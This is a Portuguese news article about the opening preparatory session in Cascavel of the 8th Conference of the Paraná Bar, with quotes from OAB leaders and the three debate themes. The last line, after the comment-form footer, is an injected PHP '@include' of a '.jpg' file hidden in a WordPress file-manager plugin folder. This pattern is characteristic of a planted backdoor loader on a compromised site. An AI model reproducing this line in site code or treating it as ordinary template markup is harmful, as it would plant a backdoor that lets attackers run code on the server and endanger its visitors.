Cascavel dá a largada para a 8ª Conferência da Advocacia Paranaense

Cascavel deu a largada para a 8ª Conferência da Advocacia Paranaense, com a realização, nesta quinta-feira (3/8), da primeira conferência preparatória. Ao longo de toda a tarde, serão realizados debates em torno de três temas escolhidos pela própria advocacia, para a construção de teses a serem levadas para a etapa final da conferência, em Curitiba, de 25 a 27 de outubro.

A presidente da OAB Paraná, Marilena Winter, declarou aberta a conferência de Cascavel, enfatizando a presença dos presidentes de subseções: Laranjeiras do Sul, Medianeira, Foz do Iguaçu, Marechal Cândido Rondon, Guaíra, Iporã, Umuarama e Assis Chateaubriand. “Nos enche de orgulho esse movimento pioneiro na história da OAB Paraná de ter, pela primeira vez, toda a advocacia envolvida na construção de temas da Conferência. Isso é o que se espera de uma conferência, que todas as vozes sejam ouvidas”, disse a presidente.

O presidente da subseção de Cascavel, Alex Gallio, deu as boas-vindas aos participantes e destacou que esse é um momento histórico na advocacia cascavelense. “Agradeço a seccional por dar a Cascavel e a toda a região oeste a oportunidade de fazer parte da 8ª Conferência. Agradeço a advocacia cascavelense por comprar essa ideia e estar aqui para debater temas tão importantes”, afirmou Gallio.

Os debates abordam os seguintes temas: Inquéritos do STF e o Projeto das Fake News; Ativismo Judicial e o Juiz na Comarca; e Julgamentos e audiências virtuais e os desafios da advocacia no interior. “São temas que têm a ver com o nosso dia a dia e sobre os quais a advocacia também quer ser ouvida”, frisou Marilena Winter ao chamar para o primeiro debate, sobre o projeto das fake news, tendo como líder o advogado Jurandir Ricardo Parzianello Júnior.

Novo modelo

Presidente da Comissão Executiva da 8º Conferência da Advocacia Paranaense, o diretor tesoureiro, Luiz Fernando Pereira, destacou o novo modelo implementado pela seccional. “A conferência, da forma como está acontecendo aqui em Cascavel, nunca aconteceu. Quem não podia ir a Curitiba, não era ouvido. Agora, a conferência está acontecendo em Cascavel, mas também já tivemos prévias em Laranjeiras, Guaíra e em outra série de cidades”, disse Pereira.

O presidente da comissão executiva destacou a grande participação já neste primeiro dia. “O auditório está lotado de pessoas querendo dar opinião. Isso é emocionante. Isso é o jeito antigo de fazer conferência – debater e não só ouvir palestras”, reiterou.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

@include "wp-content/plugins/wp-file-manager/lib/php/editors/OnlineConvert/include/0168.jpg";